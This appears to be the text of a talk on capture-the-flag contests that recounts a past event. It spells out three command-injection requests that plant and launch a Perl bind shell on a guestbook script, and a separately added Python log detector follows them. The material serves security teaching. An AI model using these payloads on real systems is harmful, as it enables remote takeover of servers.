CTF
Mike Gerschefske
Justin Gray

What is it?
Came from Defcon
UCSB sp0nsorz – won last year’s Defcon
Test skills of understanding security

What it’s not!
See who’s 1337 or l4am3r through script kiddie techniques

Rules
Don’t be Lame
This includes (D)DoS – Unfair bandwidth practices
Circumventing the private network and using public IP address (not cool)
Illegal stuff is not a good idea
E.g. don’t hack the power grid
Everything else is legal!
At Defcon team reverse engineered score system and generated tokens.
People got upset, but was legal
Can root boxes but not what’s being tested.
w00t

Last year’s event
Have to assume this year is similar
We p0wn3d the easy parts
SQL Injection
Example http://128.198.61.43/~estore/cgi-bin/login.php
Exploit unchecked user input
Security through obscurity
OMG – this really works!!!
Perl example
[Diagram: Test Network (Image 10.10.1.2, Vuln 10.10.1.3, Team 10.10.1.4, Hub, Team Box 10.10.1.1, Mon Box 10.10.1.x) and Real Network (Attack Boxes, Console for Fixes, Image Test Box, Vuln Patch Test, Vuln Attack Box, UCCS Boxes)]
Effectively created two-directional NAT.
Blocking IP addresses is futile
All traffic comes from SAME IP
Forces packet inspection
Network Topography
The example
http://128.198.61.43/~guestbook/cgi-bin/guestbook.pl?guestbook=`echo%20-e%20"\043\041/usr/bin/perl\nuse%20IO\073\nwhile(1){\nwhile(\044c=new%20IO::Socket::INET(LocalPort,\n50023,Reuse,1,Listen)->accept){\n\044~->fdopen(\044c,w)\073\nSTDIN->fdopen(\044c,r)\073\nsystem\044_%20while<>\073\n\175\n\175\n"%20>%20final.pl`
http://128.198.61.43/~guestbook/cgi-bin/guestbook.pl?guestbook=`chmod%20755%20final.pl`
http://128.198.61.43/~guestbook/cgi-bin/guestbook.pl?guestbook=`final.pl`
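As an added example (not from the slides), a small Python check a defender could run over web-server request lines to surface this class of backtick injection: it percent-decodes the parameter, then resolves the \NNN octal escapes that `echo -e` would expand, so the hidden shebang and shell metacharacters become visible. The request lines, parameter name and function names are constructed for the demo.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample request lines (not real traffic). The second mirrors the
# slide's pattern: a backtick-wrapped `echo -e` whose octal escapes hide "#!"
# and other bytes that would otherwise stand out (or break the query string).
SAMPLE_LOG = [
    r'GET /~guestbook/cgi-bin/guestbook.pl?guestbook=hello%20world HTTP/1.1',
    r'GET /~guestbook/cgi-bin/guestbook.pl?guestbook=`echo%20-e%20"\043\041/bin/sh\nid"%20>%20x.sh` HTTP/1.1',
    r'GET /~guestbook/cgi-bin/guestbook.pl?guestbook=`chmod%20755%20x.sh` HTTP/1.1',
]

OCTAL = re.compile(r'\\([0-7]{3})')

# Tokens that let a parameter value escape the command it was interpolated into.
METACHARS = {'`': 'backtick', '$(': 'dollar-paren', ';': 'semicolon',
             '|': 'pipe', '>': 'redirect', '&': 'ampersand'}


def unoctal(s):
    """Resolve \\NNN octal escapes the way `echo -e` would, e.g. \\043\\041 -> '#!'."""
    return OCTAL.sub(lambda m: chr(int(m.group(1), 8)), s)


def analyze_request(line, param='guestbook'):
    """Return [(raw_value, [indicator names], fully decoded value)] for suspicious values."""
    _method, target, _proto = line.split(' ', 2)
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)  # percent-decodes
    findings = []
    for raw in query.get(param, []):
        decoded = unoctal(raw)  # second decoding layer hidden from naive filters
        hits = {name for tok, name in METACHARS.items() if tok in decoded}
        if '#!' in decoded:
            hits.add('shebang')  # a script header inside a guestbook entry
        if hits:
            findings.append((raw, sorted(hits), decoded))
    return findings


def flagged_lines(log, param='guestbook'):
    """Indices of log lines whose parameter carries injection indicators."""
    return [i for i, line in enumerate(log) if analyze_request(line, param)]


if __name__ == '__main__':
    for i in flagged_lines(SAMPLE_LOG):
        for raw, hits, decoded in analyze_request(SAMPLE_LOG[i]):
            print(f'line {i}: {hits} -> {decoded}')
```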
The basstard demo
W00t http://128.198.61.43
SQL Injection
Unchecked code injection
File upload!!!
Buffer overrun
Security through obscurity revisited
http://128.198.61.43/test/ccauthd/ccauthd.c
Backups
Network Topography

So you wanna be a h4x0rz?
Here’s what you need!
vi – or any editor
a browser – or anything to do http
a compiler (depends on the situation)
a debugger (optional)
a clue!
Dumpster diving is cool
Getting information from the inside